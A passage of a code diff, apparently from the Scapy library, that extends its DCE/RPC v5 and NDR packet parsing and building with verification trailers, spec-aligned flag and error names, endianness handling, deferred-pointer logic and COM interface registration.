}, + end_tot_size=-2, + ), + LEShortField("Length", None), + ] + + def guess_payload_class(self, payload): + if self.Command == 0x0001: + return DceRpcSecVTBitmask + elif self.Command == 0x0002: + return DceRpcSecVTPcontext + elif self.Command == 0x0003: + return DceRpcSecVTHeader2 + return conf.raw_payload + + +# [MS-RPCE] sect 2.2.2.13.2 + + +class DceRpcSecVTBitmask(Packet): + name = "rpc_sec_vt_bitmask" + fields_desc = [ + LEIntField("bits", 1), + ] + + def default_payload_class(self, pkt): + return conf.padding_layer + + +# [MS-RPCE] sect 2.2.2.13.4 + + +class DceRpcSecVTPcontext(Packet): + name = "rpc_sec_vt_pcontext" + fields_desc = [ + UUIDEnumField( + "InterfaceId", + None, + ( + DCE_RPC_INTERFACES_NAMES.get, + lambda x: DCE_RPC_INTERFACES_NAMES_rev.get(x.lower()), + ), + uuid_fmt=UUIDField.FORMAT_LE, + ), + LEIntField("Version", 0), + UUIDEnumField( + "TransferSyntax", + None, + DCE_RPC_TRANSFER_SYNTAXES, + uuid_fmt=UUIDField.FORMAT_LE, + ), + LEIntField("TransferVersion", 0), + ] + + def default_payload_class(self, pkt): + return conf.padding_layer + + +# [MS-RPCE] sect 2.2.2.13.3 + + +class DceRpcSecVTHeader2(Packet): + name = "rpc_sec_vt_header2" + fields_desc = [ + ByteField("PTYPE", 0), + ByteField("Reserved1", 0), + LEShortField("Reserved2", 0), + LEIntField("drep", 0), + LEIntField("call_id", 0), + LEShortField("p_cont_id", 0), + LEShortField("opnum", 0), + ] + + def default_payload_class(self, pkt): + return conf.padding_layer + + +class DceRpcSecVT(Packet): + name = "Verification trailer" + fields_desc = [ + XStrFixedLenField("rpc_sec_verification_trailer", _SECTRAILER_MAGIC, length=8), + PacketListField("commands", [], DceRpcSecVTCommand), + ] + + +class _VerifTrailerField(PacketField): + def getfield( + self, + pkt, + s, + ): + if _SECTRAILER_MAGIC in s: + # a bit ugly + ind = s.index(_SECTRAILER_MAGIC) + sectrailer_bytes, remain = bytes(s[:-ind]), bytes(s[-ind:]) + vt_trailer = self.m2i(pkt, sectrailer_bytes) + if not isinstance(vt_trailer.payload, NoPayload): + # bad parse + return s, None + return remain, vt_trailer + return s, None + + +# sect 12.6.3 _DCE_RPC_5_FLAGS = { - 0x01: "FIRST_FRAG", - 0x02: "LAST_FRAG", - 0x04: "PENDING_CANCEL", - 0x10: "CONC_MPX", - 0x20: "DID_NOT_EXECUTE", - 0x40: "MAYBE", - 0x80: "OBJECT_UUID", + 0x01: "PFC_FIRST_FRAG", + 0x02: "PFC_LAST_FRAG", + 0x04: "PFC_PENDING_CANCEL", + 0x08: "PFC_RESERVED_1", + 0x10: "PFC_CONC_MPX", + 0x20: "PFC_DID_NOT_EXECUTE", + 0x40: "PFC_MAYBE", + 0x80: "PFC_OBJECT_UUID", } +# [MS-RPCE] sect 2.2.2.3 + +_DCE_RPC_5_FLAGS_2 = _DCE_RPC_5_FLAGS.copy() +_DCE_RPC_5_FLAGS_2[0x04] = "PFC_SUPPORT_HEADER_SIGN" + + _DCE_RPC_ERROR_CODES = { - # Appendix E - 0x1C000008: "nca_rpc_version_mismatch", - 0x1C000009: "nca_unspec_reject", - 0x1C00000A: "nca_s_bad_actid", - 0x1C00000B: "nca_who_are_you_failed", - 0x1C00000C: "nca_manager_not_entered", - 0x1C010002: "nca_op_rng_error", - 0x1C010003: "nca_unk_if", - 0x1C010006: "nca_wrong_boot_time", + # Appendix N + 0x1C010001: "nca_s_comm_failure", + 0x1C010002: "nca_s_op_rng_error", + 0x1C010003: "nca_s_unk_if", + 0x1C010006: "nca_s_wrong_boot_time", 0x1C010009: "nca_s_you_crashed", - 0x1C01000B: "nca_proto_error", - 0x1C010013: "nca_out_args_too_big", - 0x1C010014: "nca_server_too_busy", - 0x1C010017: "nca_unsupported_type", - 0x1C00001C: "nca_invalid_pres_context_id", - 0x1C00001D: "nca_unsupported_authn_level", - 0x1C00001F: "nca_invalid_checksum", - 0x1C000020: "nca_invalid_crc", + 0x1C01000B: "nca_s_proto_error", + 0x1C010013: "nca_s_out_args_too_big", + 0x1C010014: "nca_s_server_too_busy", + 0x1C010015: "nca_s_fault_string_too_long", + 0x1C010017: "nca_s_unsupported_type", + 0x1C000001: "nca_s_fault_int_div_by_zero", + 0x1C000002: "nca_s_fault_addr_error", + 0x1C000003: "nca_s_fault_fp_div_zero", + 0x1C000004: "nca_s_fault_fp_underflow", + 0x1C000005: "nca_s_fault_fp_overflow", + 0x1C000006: "nca_s_fault_invalid_tag", + 0x1C000007: "nca_s_fault_invalid_bound", + 0x1C000008: "nca_s_rpc_version_mismatch", + 0x1C000009: "nca_s_unspec_reject", + 0x1C00000A: "nca_s_bad_actid", + 0x1C00000B: "nca_s_who_are_you_failed", + 0x1C00000C: "nca_s_manager_not_entered", + 0x1C00000D: "nca_s_fault_cancel", + 0x1C00000E: "nca_s_fault_ill_inst", + 0x1C00000F: "nca_s_fault_fp_error", + 0x1C000010: "nca_s_fault_int_overflow", + 0x1C000012: "nca_s_fault_unspec", + 0x1C000013: "nca_s_fault_remote_comm_failure", + 0x1C000014: "nca_s_fault_pipe_empty", + 0x1C000015: "nca_s_fault_pipe_closed", + 0x1C000016: "nca_s_fault_pipe_order", + 0x1C000017: "nca_s_fault_pipe_discipline", + 0x1C000018: "nca_s_fault_pipe_comm_error", + 0x1C000019: "nca_s_fault_pipe_memory", + 0x1C00001A: "nca_s_fault_context_mismatch", + 0x1C00001B: "nca_s_fault_remote_no_memory", + 0x1C00001C: "nca_s_invalid_pres_context_id", + 0x1C00001D: "nca_s_unsupported_authn_level", + 0x1C00001F: "nca_s_invalid_checksum", + 0x1C000020: "nca_s_invalid_crc", + 0x1C000021: "nca_s_fault_user_defined", + 0x1C000022: "nca_s_fault_tx_open_failed", + 0x1C000023: "nca_s_fault_codeset_conv_error", + 0x1C000024: "nca_s_fault_object_not_found", + 0x1C000025: "nca_s_fault_no_client_stub", # [MS-ERREF] + 0x000006D3: "RPC_S_UNKNOWN_AUTHN_SERVICE", 0x000006F7: "RPC_X_BAD_STUB_DATA", + # [MS-RPCE] + 0x000006D8: "EPT_S_CANT_PERFORM_OP", } -class DceRpc5(Packet): +class DceRpc5(DceRpc): """ DCE/RPC v5 'connection-oriented' packet """ @@ -482,10 +745,19 @@ class DceRpc5(Packet): ), ByteField("rpc_vers_minor", 0), ByteEnumField("ptype", 0, DCE_RPC_TYPE), - FlagsField("pfc_flags", 0, 8, _DCE_RPC_5_FLAGS), - ] + - _drep + - [ + MultipleTypeField( + # [MS-RPCE] sect 2.2.2.3 + [ + ( + FlagsField("pfc_flags", 0x3, 8, _DCE_RPC_5_FLAGS_2), + lambda pkt: pkt.ptype in [11, 12, 13, 14, 15, 16], + ) + ], + FlagsField("pfc_flags", 0x3, 8, _DCE_RPC_5_FLAGS), + ), + ] + + _drep + + [ ByteField("reserved2", 0), _EField(ShortField("frag_len", None)), _EField( @@ -498,6 +770,12 @@ class DceRpc5(Packet): ) ), _EField(IntField("call_id", None)), + # Now let's proceed with trailer fields, i.e. at the end of the PACKET + # (below all payloads, etc.). Have a look at Figure 3 in sect 2.2.2.13 + # of [MS-RPCE] but note the following: + # - auth_verifier includes sec_trailer + the authentication token + # - auth_padding is the authentication padding + # - vt_trailer is the verification trailer ConditionalField( TrailerField( PacketLenField( @@ -509,18 +787,50 @@ class DceRpc5(Packet): ), lambda pkt: pkt.auth_len != 0, ), + ConditionalField( + TrailerField( + StrLenField( + "auth_padding", + None, + length_from=lambda pkt: pkt.auth_verifier.auth_pad_length, + ) + ), + lambda pkt: pkt.auth_len != 0, + ), + TrailerField( + _VerifTrailerField("vt_trailer", None, DceRpcSecVT), + ), ] ) + def do_dissect(self, s): + # Overload do_dissect to only include the current layer in dissection. + # This allows to support TrailerFields, even in the case where multiple DceRpc5 + # packets are concatenated + frag_len = self.get_field("frag_len").getfield(self, s[8:10])[1] + s, remain = s[:frag_len], s[frag_len:] + return super(DceRpc5, self).do_dissect(s) + remain + + def extract_padding(self, s): + # Now, take any data that doesn't fit in the current fragment and make it + # padding. The caller is responsible for looking for eventual padding and + # creating the next fragment, etc. + pay_len = self.frag_len - len(self.original) + len(s) + return s[:pay_len], s[pay_len:] + def post_build(self, pkt, pay): - if self.auth_verifier and self.auth_verifier.auth_pad_length is None: + if ( + self.auth_verifier + and self.auth_padding is None + and self.auth_verifier.auth_pad_length is None + ): # Compute auth_len and add padding auth_len = self.get_field("auth_len").getfield(self, pkt[10:12])[1] + 8 auth_verifier, pay = pay[-auth_len:], pay[:-auth_len] - # [MS-RPCE] - # > The sec_trailer structure MUST be 16-byte aligned - # > with respect to the beginning of the PDU Body< - padlen = (-(len(pay) - 8)) % 16 + pdu_len = len(pay) + if self.payload: + pdu_len -= len(self.payload.self_build()) + padlen = (-pdu_len) % _COMMON_AUTH_PAD auth_verifier = ( auth_verifier[:2] + struct.pack("B", padlen) + auth_verifier[3:] ) @@ -529,9 +839,9 @@ def post_build(self, pkt, pay): # Compute frag_len length = len(pkt) + len(pay) pkt = ( - pkt[:8] + - self.get_field("frag_len").addfield(self, b"", length) + - pkt[10:] + pkt[:8] + + self.get_field("frag_len").addfield(self, b"", length) + + pkt[10:] ) return pkt + pay @@ -546,29 +856,13 @@ def tcp_reassemble(cls, data, _, session): if endian not in [0, 1]: return length = struct.unpack(("<" if endian else ">") + "H", data[8:10])[0] - if len(data) == length: - # Start a DCE/RPC session for this TCP stream - dcerpc_session = session.get("dcerpc_session", None) - if not dcerpc_session: - dcerpc_session = session["dcerpc_session"] = DceRpcSession() - pkt = dcerpc_session._process_dcerpc_packet(DceRpc5(data)) - return pkt + if len(data) >= length: + return DceRpc5(data) # sec 12.6.3.1 -DCE_RPC_INTERFACES_NAMES = {} -DCE_RPC_INTERFACES_NAMES_rev = {} - -DCE_RPC_TRANSFER_SYNTAXES = { - UUID("00000000-0000-0000-0000-000000000000"): "NULL", - UUID("6cb71c2c-9812-4540-0300-000000000000"): "Bind Time Feature Negotiation", - UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"): "NDR 2.0", - UUID("71710533-beba-4937-8319-b5dbef9ccc36"): "NDR64", -} - - class DceRpc5AbstractSyntax(EPacket): name = "Presentation Syntax (p_syntax_id_t)" fields_desc = [ @@ -579,12 +873,11 @@ class DceRpc5AbstractSyntax(EPacket): ( # Those are dynamic DCE_RPC_INTERFACES_NAMES.get, - DCE_RPC_INTERFACES_NAMES_rev.get, + lambda x: DCE_RPC_INTERFACES_NAMES_rev.get(x.lower()), ), ) ), - _EField(ShortField("if_version", 3)), - _EField(ShortField("if_version_minor", 0)), + _EField(IntField("if_version", 3)), ] @@ -598,15 +891,14 @@ class DceRpc5TransferSyntax(EPacket): DCE_RPC_TRANSFER_SYNTAXES, ) ), - _EField(ShortField("if_version", 3)), - _EField(ShortField("reserved", 0)), + _EField(IntField("if_version", 3)), ] class DceRpc5Context(EPacket): name = "Presentation Context (p_cont_elem_t)" fields_desc = [ - _EField(ShortField("context_id", 0)), + _EField(ShortField("cont_id", 0)), FieldLenField("n_transfer_syn", None, count_of="transfer_syntaxes", fmt="B"), ByteField("reserved", 0), EPacketField("abstract_syntax", None, DceRpc5AbstractSyntax), @@ -776,7 +1068,7 @@ class DceRpc5Fault(_DceRpcPayload): _EField(IntField("alloc_hint", 0)), _EField(ShortField("cont_id", 0)), ByteField("cancel_count", 0), - ByteField("reserved", 0), + FlagsField("reserved", 0, -8, {0x1: "RPC extended error"}), _EField(LEIntEnumField("status", 0, _DCE_RPC_ERROR_CODES)), IntField("reserved2", 0), ] @@ -799,7 +1091,7 @@ class DceRpc5Request(_DceRpcPayload): _EField(UUIDField("object", None)), align=8, ), - lambda pkt: pkt.underlayer and pkt.underlayer.pfc_flags.OBJECT_UUID, + lambda pkt: pkt.underlayer and pkt.underlayer.pfc_flags.PFC_OBJECT_UUID, ), ] @@ -823,33 +1115,62 @@ class DceRpc5Response(_DceRpcPayload): # --- API -DceRpcOp = namedtuple("DceRpcOp", ["request", "response"]) +DceRpcOp = collections.namedtuple("DceRpcOp", ["request", "response"]) DCE_RPC_INTERFACES = {} class DceRpcInterface: - def __init__(self, name, uuid, version, opnums): + def __init__(self, name, uuid, version_tuple, if_version, opnums): self.name = name self.uuid = uuid - self.version, self.minor_version = map(int, version.split(".")) + self.major_version, self.minor_version = version_tuple + self.if_version = if_version self.opnums = opnums def __repr__(self): - return "" % (self.name, self.version) + return "" % ( + self.name, + self.major_version, + self.minor_version, + ) def register_dcerpc_interface(name, uuid, version, opnums): """ Register a DCE/RPC interface """ - if uuid in DCE_RPC_INTERFACES: - raise ValueError("Interface is already registered !") - DCE_RPC_INTERFACES_NAMES[uuid] = "%s (v%s)" % (name.upper(), version) - DCE_RPC_INTERFACES_NAMES_rev[name.upper()] = uuid - DCE_RPC_INTERFACES[uuid] = DceRpcInterface( + version_tuple = tuple(map(int, version.split("."))) + assert len(version_tuple) == 2, "Version should be in format 'X.X' !" + if_version = (version_tuple[1] << 16) + version_tuple[0] + if (uuid, if_version) in DCE_RPC_INTERFACES: + # Interface is already registered. + interface = DCE_RPC_INTERFACES[(uuid, if_version)] + if interface.name == name: + if interface.if_version == if_version and set(opnums) - set( + interface.opnums + ): + # Interface is an extension of a previous interface + interface.opnums.update(opnums) + return + elif interface.if_version != if_version: + # Interface has a different version + pass + else: + log_runtime.warning( + "This interface is already registered: %s. Skip" % interface + ) + return + else: + raise ValueError( + "An interface with the same UUID is already registered: %s" % interface + ) + DCE_RPC_INTERFACES_NAMES[uuid] = name + DCE_RPC_INTERFACES_NAMES_rev[name.lower()] = uuid + DCE_RPC_INTERFACES[(uuid, if_version)] = DceRpcInterface( name, uuid, - version, + version_tuple, + if_version, opnums, ) # bind for build @@ -867,38 +1188,87 @@ def find_dcerpc_interface(name): raise AttributeError("Unknown interface !") +COM_INTERFACES = {} + + +class ComInterface: + def __init__(self, name, uuid, opnums): + self.name = name + self.uuid = uuid + self.opnums = opnums + + def __repr__(self): + return "" % (self.name,) + + +def register_com_interface(name, uuid, opnums): + """ + Register a COM interface + """ + COM_INTERFACES[uuid] = ComInterface( + name, + uuid, + opnums, + ) + + # --- NDR fields - [C706] chap 14 -def _set_ndr_on(f, ndr64): +def _set_ctx_on(f, obj): if isinstance(f, _NDRPacket): - f.ndr64 = ndr64 + f.ndr64 = obj.ndr64 + f.ndrendian = obj.ndrendian if isinstance(f, list): for x in f: if isinstance(x, _NDRPacket): - x.ndr64 = ndr64 + x.ndr64 = obj.ndr64 + x.ndrendian = obj.ndrendian + + +def _e(ndrendian): + return {"big": ">", "little": "<"}[ndrendian] class _NDRPacket(Packet): - __slots__ = ["ndr64", "defered_pointers", "request_packet"] + __slots__ = ["ndr64", "ndrendian", "deferred_pointers", "request_packet"] def __init__(self, *args, **kwargs): - self.ndr64 = kwargs.pop("ndr64", True) + self.ndr64 = kwargs.pop("ndr64", False) + self.ndrendian = kwargs.pop("ndrendian", "little") # request_packet is used in the session, so that a response packet # can resolve union arms if the case parameter is in the request. self.request_packet = kwargs.pop("request_packet", None) - self.defered_pointers = [] + self.deferred_pointers = [] super(_NDRPacket, self).__init__(*args, **kwargs) - def dissect(self, s): + def do_dissect(self, s): _up = self.parent or self.underlayer if _up and isinstance(_up, _NDRPacket): self.ndr64 = _up.ndr64 - return super(_NDRPacket, self).dissect(s) + self.ndrendian = _up.ndrendian + else: + # See comment above NDRConstructedType + return NDRConstructedType([]).read_deferred_pointers( + self, super(_NDRPacket, self).do_dissect(s) + ) + return super(_NDRPacket, self).do_dissect(s) + + def post_dissect(self, s): + if self.deferred_pointers: + # Can't trust the cache if there were deferred pointers + self.raw_packet_cache = None + return s def do_build(self): + _up = self.parent or self.underlayer for f in self.fields.values(): - _set_ndr_on(f, self.ndr64) + _set_ctx_on(f, self) + if not _up or not isinstance(_up, _NDRPacket): + # See comment above NDRConstructedType + return NDRConstructedType([]).add_deferred_pointers( + self, super(_NDRPacket, self).do_build() + ) return super(_NDRPacket, self).do_build() def default_payload_class(self, pkt): @@ -906,22 +1276,24 @@ def default_payload_class(self, pkt): def clone_with(self, *args, **kwargs): pkt = super(_NDRPacket, self).clone_with(*args, **kwargs) - # We need to copy defered_pointers to not break pointer deferral + # We need to copy deferred_pointers to not break pointer deferral # on build. - pkt.defered_pointers = self.defered_pointers + pkt.deferred_pointers = self.deferred_pointers pkt.ndr64 = self.ndr64 + pkt.ndrendian = self.ndrendian return pkt def copy(self): pkt = super(_NDRPacket, self).copy() - pkt.defered_pointers = self.defered_pointers + pkt.deferred_pointers = self.deferred_pointers pkt.ndr64 = self.ndr64 + pkt.ndrendian = self.ndrendian return pkt def show2(self, dump=False, indent=3, lvl="", label_lvl=""): - return self.__class__(bytes(self), ndr64=self.ndr64).show( - dump, indent, lvl, label_lvl - ) + return self.__class__( + bytes(self), ndr64=self.ndr64, ndrendian=self.ndrendian + ).show(dump, indent, lvl, label_lvl) def getfield_and_val(self, attr): try: @@ -935,6 +1307,16 @@ def getfield_and_val(self, attr): pass raise + def valueof(self, request): + """ + Util to get the value of a NDRField, ignoring arrays, pointers, etc. + """ + val = self + for ndr_field in request.split("."): + fld, fval = val.getfield_and_val(ndr_field) + val = fld.valueof(val, fval) + return val + class _NDRAlign: def padlen(self, flen, pkt): @@ -963,51 +1345,34 @@ def __init__(self, fld, align, padwith=None): super(NDRAlign, self).__init__(fld, align=align, padwith=padwith) +class _VirtualField(Field): + # Hold a value but doesn't show up when building/dissecting + def addfield(self, pkt, s, x): + return s + + def getfield(self, pkt, s): + return s, None + + class _NDRPacketMetaclass(Packet_metaclass): def __new__(cls, name, bases, dct): newcls = super(_NDRPacketMetaclass, cls).__new__(cls, name, bases, dct) - conformants = dct.get("CONFORMANT_COUNT", 0) + conformants = dct.get("DEPORTED_CONFORMANTS", []) if conformants: - if conformants == 1: + amount = len(conformants) + if amount == 1: newcls.fields_desc.insert( 0, - MultipleTypeField( - [ - ( - NDRLongField("max_count", 0), - lambda pkt: pkt and pkt.ndr64, - ) - ], - NDRIntField("max_count", 0), - ), + _VirtualField("max_count", None), ) else: newcls.fields_desc.insert( 0, - MultipleTypeField( - [ - ( - NDRAlign( - FieldListField( - "max_counts", - 0, - LELongField("", 0), - count_from=lambda _: conformants, - ), - align=(8, 8), - ), - lambda pkt: pkt and pkt.ndr64, - ) - ], - NDRAlign( - FieldListField( - "max_counts", - 0, - LEIntField("", 0), - count_from=lambda _: conformants, - ), - align=(4, 4), - ), + FieldListField( + "max_counts", + [], + _VirtualField("", 0), + count_from=lambda _: amount, ), ) return newcls # type: ignore @@ -1023,79 +1388,120 @@ class NDRPacket(_NDRPacket, metaclass=_NDRPacketMetaclass): # NDR64 pad structures # [MS-RPCE] 2.2.5.3.4.1 ALIGNMENT = (1, 1) - # Conformants max_count can be added to the beginning - CONFORMANT_COUNT = 0 + # [C706] sect 14.3.7 - Conformants max_count can be added to the beginning + DEPORTED_CONFORMANTS = [] # Primitive types -NDRByteField = ByteField -NDRSignedByteField = SignedByteField -class NDRShortField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRShortField, self).__init__(LEShortField(*args, **kwargs), align=(2, 2)) +class _NDRValueOf: + def valueof(self, pkt, x): + return x -class NDRSignedShortField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRSignedShortField, self).__init__( - LESignedShortField(*args, **kwargs), align=(2, 2) - ) +class _NDRLenField(_NDRValueOf, Field): + """ + Field similar to FieldLenField that takes size_of and adjust as arguments, + and take the value of a size on build. + """ + __slots__ = ["size_of", "adjust"] -class NDRIntField(NDRAlign): def __init__(self, *args, **kwargs): - super(NDRIntField, self).__init__(LEIntField(*args, **kwargs), align=(4, 4)) + self.size_of = kwargs.pop("size_of", None) + self.adjust = kwargs.pop("adjust", lambda _, x: x) + super(_NDRLenField, self).__init__(*args, **kwargs) + + def i2m(self, pkt, x): + if x is None and pkt is not None and self.size_of is not None: + fld, fval = pkt.getfield_and_val(self.size_of) + f = fld.i2len(pkt, fval) + x = self.adjust(pkt, f) + elif x is None: + x = 0 + return x -class NDRSignedIntField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRSignedIntField, self).__init__( - LESignedIntField(*args, **kwargs), align=(4, 4) - ) +class NDRByteField(_NDRLenField, ByteField): + pass -class NDRLongField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRLongField, self).__init__(LELongField(*args, **kwargs), align=(8, 8)) +class NDRSignedByteField(_NDRLenField, SignedByteField): + pass -class NDRSignedLongField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRSignedLongField, self).__init__( - LESignedLongField(*args, **kwargs), align=(8, 8) - ) +class _NDRField(_NDRLenField): + FMT = "" + ALIGN = (0, 0) + def getfield(self, pkt, s): + return NDRAlign( + Field("", 0, fmt=_e(pkt.ndrendian) + self.FMT), align=self.ALIGN + ).getfield(pkt, s) -class NDRIEEEFloatField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRIEEEFloatField, self).__init__( - IEEEFloatField(*args, **kwargs), align=(4, 4) - ) + def addfield(self, pkt, s, val): + return NDRAlign( + Field("", 0, fmt=_e(pkt.ndrendian) + self.FMT), align=self.ALIGN + ).addfield(pkt, s, self.i2m(pkt, val)) -class NDRIEEEDoubleField(NDRAlign): - def __init__(self, *args, **kwargs): - super(NDRIEEEDoubleField, self).__init__( - IEEEDoubleField(*args, **kwargs), align=(8, 8) - ) +class NDRShortField(_NDRField): + FMT = "H" + ALIGN = (2, 2) + + +class NDRSignedShortField(_NDRField): + FMT = "h" + ALIGN = (2, 2) + + +class NDRIntField(_NDRField): + FMT = "I" + ALIGN = (4, 4) + + +class NDRSignedIntField(_NDRField): + FMT = "i" + ALIGN = (4, 4) + + +class NDRLongField(_NDRField): + FMT = "Q" + ALIGN = (8, 8) + + +class NDRSignedLongField(_NDRField): + FMT = "q" + ALIGN = (8, 8) + + +class NDRIEEEFloatField(_NDRField): + FMT = "f" + ALIGN = (4, 4) + + +class NDRIEEEDoubleField(_NDRField): + FMT = "d" + ALIGN = (8, 8) # Enum types -class _NDREnumField(EnumField): +class _NDREnumField(_NDRValueOf, EnumField): # [MS-RPCE] sect 2.2.5.2 - Enums are 4 octets in NDR64 - FMTS = [") + class NDRConstructedType(object): def __init__(self, fields): @@ -1257,46 +1699,58 @@ def getfield(self, pkt, s): if isinstance(fval, _NDRPacket): # If a sub-packet we just dissected has deferred pointers, # pass it to parent packet to propagate. - pkt.defered_pointers.extend(fval.defered_pointers) - del fval.defered_pointers[:] + pkt.deferred_pointers.extend(fval.deferred_pointers) + del fval.deferred_pointers[:] if self.handles_deferred: - # Now read content of the pointers that were deferred - q = deque() - q.extend(pkt.defered_pointers) - del pkt.defered_pointers[:] - while q: - # Recursively resolve pointers that were deferred - ptr, getfld = q.popleft() - s, val = getfld(s) - ptr.value = val - if isinstance(val, _NDRPacket): - # Pointer resolves to a packet.. that may have deferred pointers? - q.extend(val.defered_pointers) - del val.defered_pointers[:] + # This field handles deferral ! + s = self.read_deferred_pointers(pkt, s) return s, fval + def read_deferred_pointers(self, pkt, s): + # Now read content of the pointers that were deferred + q = collections.deque() + q.extend(pkt.deferred_pointers) + del pkt.deferred_pointers[:] + while q: + # Recursively resolve pointers that were deferred + ptr, getfld = q.popleft() + s, val = getfld(s) + ptr.value = val + if isinstance(val, _NDRPacket): + # Pointer resolves to a packet.. that may have deferred pointers? + q.extend(val.deferred_pointers) + del val.deferred_pointers[:] + return s + def addfield(self, pkt, s, val): - # Same logic than above, same comments. s = super(NDRConstructedType, self).addfield(pkt, s, val) if isinstance(val, _NDRPacket): - pkt.defered_pointers.extend(val.defered_pointers) - del val.defered_pointers[:] + # If a sub-packet we just dissected has deferred pointers, + # pass it to parent packet to propagate. + pkt.deferred_pointers.extend(val.deferred_pointers) + del val.deferred_pointers[:] if self.handles_deferred: - q = deque() - q.extend(pkt.defered_pointers) - del pkt.defered_pointers[:] - while q: - addfld, fval = q.popleft() - s = addfld(s) - if isinstance(fval, NDRPointer) and isinstance(fval.value, _NDRPacket): - q.extend(fval.value.defered_pointers) - del fval.value.defered_pointers[:] + # This field handles deferral ! + s = self.add_deferred_pointers(pkt, s) + return s + + def add_deferred_pointers(self, pkt, s): + # Now add content of pointers that were deferred + q = collections.deque() + q.extend(pkt.deferred_pointers) + del pkt.deferred_pointers[:] + while q: + addfld, fval = q.popleft() + s = addfld(s) + if isinstance(fval, NDRPointer) and isinstance(fval.value, _NDRPacket): + q.extend(fval.value.deferred_pointers) + del fval.value.deferred_pointers[:] return s -class _NDRPacketField(PacketField): +class _NDRPacketField(_NDRValueOf, PacketField): def m2i(self, pkt, m): - return self.cls(m, ndr64=pkt.ndr64, _parent=pkt) + return self.cls(m, ndr64=pkt.ndr64, ndrendian=pkt.ndrendian, _parent=pkt) # class _NDRPacketPadField(PadField): @@ -1309,16 +1763,51 @@ def m2i(self, pkt, m): class NDRPacketField(NDRConstructedType, NDRAlign): def __init__(self, name, default, pkt_cls, **kwargs): - fld = _NDRPacketField(name, default, pkt_cls=pkt_cls, **kwargs) + self.DEPORTED_CONFORMANTS = pkt_cls.DEPORTED_CONFORMANTS + self.fld = _NDRPacketField(name, default, pkt_cls=pkt_cls, **kwargs) NDRAlign.__init__( self, # There is supposed to be padding after a struct in NDR64? # _NDRPacketPadField(fld, align=pkt_cls.ALIGNMENT), - fld, + self.fld, align=pkt_cls.ALIGNMENT, ) NDRConstructedType.__init__(self, pkt_cls.fields_desc) + def getfield(self, pkt, x): + # Handle deformed conformants max_count here + if self.DEPORTED_CONFORMANTS: + # C706 14.3.2: "In other words, the size information precedes the + # structure and is aligned independently of the structure alignment." + fld = NDRInt3264Field("", 0) + max_counts = [] + for _ in self.DEPORTED_CONFORMANTS: + x, max_count = fld.getfield(pkt, x) + max_counts.append(max_count) + res, val = super(NDRPacketField, self).getfield(pkt, x) + if len(max_counts) == 1: + val.max_count = max_counts[0] + else: + val.max_counts = max_counts + return res, val + return super(NDRPacketField, self).getfield(pkt, x) + + def addfield(self, pkt, s, x): + # Handle deformed conformants max_count here + if self.DEPORTED_CONFORMANTS: + mcfld = NDRInt3264Field("", 0) + if len(self.DEPORTED_CONFORMANTS) == 1: + max_counts = [x.max_count] + else: + max_counts = x.max_counts + for fldname, max_count in zip(self.DEPORTED_CONFORMANTS, max_counts): + if max_count is None: + fld, val = x.getfield_and_val(fldname) + max_count = fld.i2len(x, val) + s = mcfld.addfield(pkt, s, max_count) + return super(NDRPacketField, self).addfield(pkt, s, x) + return super(NDRPacketField, self).addfield(pkt, s, x) + # Array types @@ -1335,13 +1824,13 @@ class _NDRPacketListField(NDRConstructedType, PacketListField): def __init__(self, name, default, pkt_cls, **kwargs): self.ptr_pack = kwargs.pop("ptr_pack", False) - PacketListField.__init__(self, name, default, pkt_cls=pkt_cls, **kwargs) if self.ptr_pack: self.fld = NDRFullPointerField( NDRPacketField("", None, pkt_cls), deferred=True ) else: self.fld = NDRPacketField("", None, pkt_cls) + PacketListField.__init__(self, name, default, pkt_cls=pkt_cls, **kwargs) NDRConstructedType.__init__(self, [self.fld]) def m2i(self, pkt, s): @@ -1351,12 +1840,21 @@ def m2i(self, pkt, s): val.add_payload(conf.padding_layer(remain)) return val + def any2i(self, pkt, x): + # User-friendly helper + if isinstance(x, list): + x = [self.fld.any2i(pkt, y) for y in x] + return super(_NDRPacketListField, self).any2i(pkt, x) + def i2m(self, pkt, val): return self.fld.addfield(pkt, b"", val) def i2len(self, pkt, x): return len(x) + def valueof(self, pkt, x): + return [self.fld.valueof(pkt, y) for y in x] + class NDRFieldListField(NDRConstructedType, FieldListField): """ @@ -1366,9 +1864,20 @@ class NDRFieldListField(NDRConstructedType, FieldListField): islist = 1 def __init__(self, *args, **kwargs): + kwargs.pop("ptr_pack", None) # TODO: unimplemented + if "length_is" in kwargs: + kwargs["count_from"] = kwargs.pop("length_is") + elif "size_is" in kwargs: + kwargs["count_from"] = kwargs.pop("size_is") FieldListField.__init__(self, *args, **kwargs) NDRConstructedType.__init__(self, [self.field]) + def i2len(self, pkt, x): + return len(x) + + def valueof(self, pkt, x): + return [self.field.valueof(pkt, y) for y in x] + class NDRVaryingArray(_NDRPacket): fields_desc = [ @@ -1390,34 +1899,56 @@ class NDRVaryingArray(_NDRPacket): class _NDRVarField(object): + """ + NDR Varying Array / String field + """ + + LENGTH_FROM = False + COUNT_FROM = False + + def __init__(self, *args, **kwargs): + # size is either from the length_is, if specified, or the "actual_count" + self.from_actual = "length_is" not in kwargs + length_is = kwargs.pop("length_is", lambda pkt: pkt.actual_count) + if self.LENGTH_FROM: + kwargs["length_from"] = length_is + elif self.COUNT_FROM: + kwargs["count_from"] = length_is + super(_NDRVarField, self).__init__(*args, **kwargs) + def getfield(self, pkt, s): - fmt = ["", 0x10: "<"}.get(pkt.underlayer.Endianness, "<") + + class NDRSerialization1Header(Packet): fields_desc = [ ByteField("Version", 1), - ByteEnumField("Endianness", 0, {0x00: "Big-endian", 0x10: "Little-endian"}), + ByteEnumField("Endianness", 0x10, {0x00: "big", 0x10: "little"}), LEShortField("CommonHeaderLength", 8), XLEIntField("Filler", 0xCCCCCCCC), ] @@ -1786,8 +2383,10 @@ class NDRSerialization1Header(Packet): class NDRSerialization1PrivateHeader(Packet): fields_desc = [ - LEIntField("ObjectBufferLength", 0), - LEIntField("Filler", 0), + EField( + LEIntField("ObjectBufferLength", 0), endianness_from=_get_ndrtype1_endian + ), + XLEIntField("Filler", 0), ] @@ -1796,39 +2395,92 @@ def ndr_deserialize1(b, cls, ndr64=False): Deserialize Type Serialization Version 1 according to [MS-RPCE] sect 2.2.6 """ if issubclass(cls, NDRPacket): + # We use an intermediary class for two reasons: + # - it properly sets deferred 